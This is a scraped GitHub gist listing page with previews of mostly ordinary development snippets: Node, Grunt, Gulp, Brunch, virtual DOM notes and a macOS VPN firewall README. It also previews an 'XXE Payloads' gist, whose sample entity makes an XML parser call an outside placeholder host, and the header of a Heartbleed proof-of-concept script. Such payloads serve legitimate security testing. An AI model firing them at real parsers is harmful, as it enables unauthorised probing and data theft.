Skip to content

Instantly share code, notes, and snippets.

View jeremybuis's full-sized avatar

Jeremy Buis jeremybuis

22 followers · 25 following
View GitHub Profile
@ericelliott
ericelliott / essential-javascript-links.md
Last active April 22, 2024 10:15
Essential JavaScript Links
@staaldraad
staaldraad / XXE_payloads
Last active April 29, 2024 14:27
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@jdx
jdx / boot.js
Last active March 16, 2023 18:08
zero-downtime node.js app runner
// This script will boot app.js with the number of workers
// specified in WORKER_COUNT.
//
// The master will respond to SIGHUP, which will trigger
// restarting all the workers and reloading the app.
var cluster = require('cluster');
var workerCount = process.env.WORKER_COUNT || 2;
// Defines what each worker needs to run
@takeshixx
takeshixx / hb-test.py
Last active March 9, 2024 13:37
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@rauluranga
rauluranga / server.coffee
Created March 7, 2014 19:34
Custom Brunch server with proxy support
express = require 'express'
sysPath = require 'path'
httpProxy = require 'http-proxy';
request = require 'request';
apiProxy = httpProxy.createServer({
target:'http://localhost:3000'
});
@booleanbetrayal
booleanbetrayal / Gruntfile.js
Last active November 9, 2023 18:59
Example GruntJS configuration for a replacement to the Sprockets Rails asset pipeline
'use strict';
module.exports = function(grunt) {
// load all grunt tasks
require('matchdep').filterDev('grunt-*').forEach(grunt.loadNpmTasks);
// configurable paths
var paths = {
@MoOx
MoOx / gulpfile.js
Last active November 4, 2021 10:19
///
var pkg = require("./package.json")
, rimraf = require("rimraf")
, gulp = require("gulp")
, gutil = require("gulp-util")
, filter = require("gulp-filter")
, plumber = require("gulp-plumber")
, concat = require("gulp-concat")
gulp.task("clean", function() {
@Raynos
Raynos / 0virtual-dom.md
Last active February 14, 2024 20:54

Virtual DOM and diffing algorithm

There was a [great article][1] about how react implements it's virtual DOM. There are some really interesting ideas in there but they are deeply buried in the implementation of the React framework.

However, it's possible to implement just the virtual DOM and diff algorithm on it's own as a set of independent modules.

@scy
scy / README.md
Last active July 7, 2023 09:27
My OSX PF config for #30C3.

My OS X “VPN only” Setup For #30C3

You should never let passwords or private data be transmitted over an untrusted network (your neighbor’s, the one at Starbucks or the company) anyway, but on a hacker congress like the #30C3, this rule is almost vital.

Hackers get bored easily, and when they’re bored, they’re starting to look for things to play with. And a network with several thousand connected users is certainly an interesting thing to play with. Some of them might start intercepting the data on the network or do other nasty things with the packets that they can get.

If these packets are encrypted, messing with them is much harder (but not impossible! – see the end of this article). So you want your packets to be always encrypted. And the best way to do that is by using a VPN.

Target audience

@jonbretman
jonbretman / type.js
Last active January 16, 2024 01:16
Simple type checking in JavaScript.
(function (root) {
var type = function (o) {
// handle null in old IE
if (o === null) {
return 'null';
}
// handle DOM elements